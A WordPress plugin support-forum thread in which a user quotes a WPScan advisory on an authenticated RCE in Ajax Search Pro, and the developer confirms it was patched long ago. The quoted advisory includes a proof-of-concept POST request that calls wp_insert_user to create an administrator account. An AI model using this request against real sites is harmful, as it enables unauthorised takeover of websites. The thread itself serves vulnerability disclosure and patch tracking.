This website uses cookies to personalize your experience. By using this website you agree to our cookie policy.

Authenticated RCE Vulnerability Logged Not Closed

Home Forums Product Support Forums Ajax Search Pro for WordPress Support Authenticated RCE Vulnerability Logged Not Closed

Viewing 4 posts - 1 through 4 (of 4 total)
  • Author
    Posts
  • December 1, 2016 at 7:23 am #11068
    OddenCreativeOddenCreative
    Participant

    I would like to get a status update regarding this potential exploit… I just purchased this Plugin and was starting to configure when I got an alert about a potential exploit.

    An Authentication RCE vulnerability was reported on this plugin

    ajax-search-pro 4.9.8 – 0 more info

    https://wpvulndb.com/plugins/ajax-search-pro

    https://wpvulndb.com/vulnerabilities/7859

    Ajax Search Pro – Authenticated RCE

    Sign up to our free email alerts service for instant vulnerability notifications!

    Description
    Affected versions unknown.

    Proof of Concept:

    This will register an administrator with username “xADMIN” and password “xPASS”:

    POST request to: /wp-admin/admin-ajax.php?page=ajax-search-pro/backend/settings.php&action=wpdreams-ajaxinput

    With POST data:
    wpdreams_callback=wp_insert_user&user_login=xADMIN&user_pass=xPASS&role=administrator
    Affects

    Plugin ajax-search-pro
    References

    PACKETSTORM 130955
    URL http://web.archive.org/web/20150619084745/http://research.evex.pw/?vuln=9
    Classification

    Type RCE
    OWASP Top 10 A1: Injection
    CWE CWE-94
    Miscellaneous

    Submitter A. Samman
    Submitter Twitter Evex_1337
    Views 350
    Verified No
    WPVDB ID 7859
    Timeline

    Publicly Published 2015-03-18 (over 1 year ago)
    Added 2015-03-21 (over 1 year ago)
    Last Updated 2016-04-24 (7 months ago)

    Copyright & License

    Copyright All data and resources contained within this page and this web site is Copyright © The WPScan Team.
    License Some of this data may be used for non-commercial purposes, however, any potential commercial usage of this data will require a license. If you would like to inquire about a commercial license please contact us.

    December 1, 2016 at 8:36 am #11069
    Ernest MarcinkoErnest Marcinko
    Keymaster

    Hi,

    It has been fixed a very long time ago, they messaged me before publishing the report so a fix was released before that.

    December 1, 2016 at 7:30 pm #11086
    OddenCreativeOddenCreative
    Participant

    Perhaps you can submit a note back to them so that they can mark it fixed, and close it. I know that if the next developer/admin comes along to check logs and sees that flagged, they will likely contact you, too.

    We run clean green on our servers. A vulnerability or exploit mark is typically grounds for removal, or we look to help fix them.

    Thanks for replying so quickly!

    December 1, 2016 at 7:41 pm #11088
    Ernest MarcinkoErnest Marcinko
    Keymaster

    Hi!

    I’ve sent a message again, and they already marked it as resolved 🙂
    Thanks for notfying me, I thought this was done a long time ago.

  • Author
    Posts
Viewing 4 posts - 1 through 4 (of 4 total)
  • You must be logged in to reply to this topic.